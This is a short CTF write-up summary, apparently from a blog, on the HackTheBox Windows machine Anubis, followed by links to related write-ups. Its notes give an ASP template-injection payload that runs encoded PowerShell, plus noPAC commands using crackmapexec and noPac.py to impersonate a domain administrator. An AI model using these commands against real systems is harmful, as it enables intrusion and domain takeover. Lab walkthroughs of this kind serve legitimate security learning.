• Home
  • Blog
  • CTF
  • ASP, Windows Containers, Responder & NoPAC – Anubis @ HackTheBox

ASP, Windows Containers, Responder & NoPAC – Anubis @ HackTheBox

29Jan

ASP, Windows Containers, Responder & NoPAC – Anubis @ HackTheBox

By CTF , , , ,

We are solving Anubis, a 50-point windows machine on HackTheBox which involves an ASP template injection, windows containers, and stealing hashes with Responder. Later we’ll escalate privileges using noPAC.

Notes

ASP Injection

<% CreateObject("WScript.Shell").Exec("powershell -enc ...") %>

noPAC

# https://github.com/Ridter/noPac
proxychains -q crackmapexec smb 172.31.48.1 -u localadmin -p 'Secret123!' --no-bruteforce
sudo date -s "$(curl -sI https://windcorp.htb -k | grep -i '^date:'|cut -d' ' -f2-)"
proxychains -q python3 noPac.py windcorp.htb/localadmin:'Secret123' -dc-ip 172.31.48.1 -dc-host EARTH -shell --impersonate administrator

Share this post

Author

Related Posts

10Jun

Protected: Rastalabs Prolab @ HackTheBox

There is no excerpt because this is a protected post. read more

17Jul

LFI to RCE, Sticky Notes & SQLi – Breadcrumbs @ HackTheBox

We are solving Breadcrumbs, a 40-point Windows machine on HackTheBox. For user, we exploit an LFI to read PHP source... read more

23May

Rope @ HackTheBox

Rope is a 50-point machine on HackTheBox that involves 3 binary exploits. There is a format string vulnerability in the... read more

10Jul

Electron-Updater RCE – Atom @ HackTheBox

We are going to solve Atom, a 30-point machine on HackTheBox where we'll analyze an electron app and exploit its... read more

24Jul

Drupalgeddon & Sudo Snap Install – Armageddon @ HackTheBox

We are solving Armageddon, a really easy 20-point machine on HackTheBox that involves the drupalgeddon exploit, reading & cracking a... read more

28Apr

Unattended @ HackTheBox

Unattended is a high difficulty machine on hackthebox, featuring manual sql injection, log poisoning and some guessing. read more

17Sep

SQLi, LFI to RCE and Unintended Privesc via XAMLX & Impersonation – StreamIO @ HackTheBox

Video & additional notes for StreamIO, a medium difficulty Windows machine on HackTheBox that involves manual MSSQL Injection, going from... read more

20Jul

Craft @ HackTheBox

Craft is a medium difficulty box. read more

27Mar

Luanne @ HackTheBox

Solving Luanne on HackTheBox. This is an easy 20-point machine involving a simple command injection and some password cracking. read more

13Jun

Monteverde @ HackTheBox

Monteverde is a 30-point Windows machine on HackTheBox that involves some LDAP and SMB enumeration to get the user flag.... read more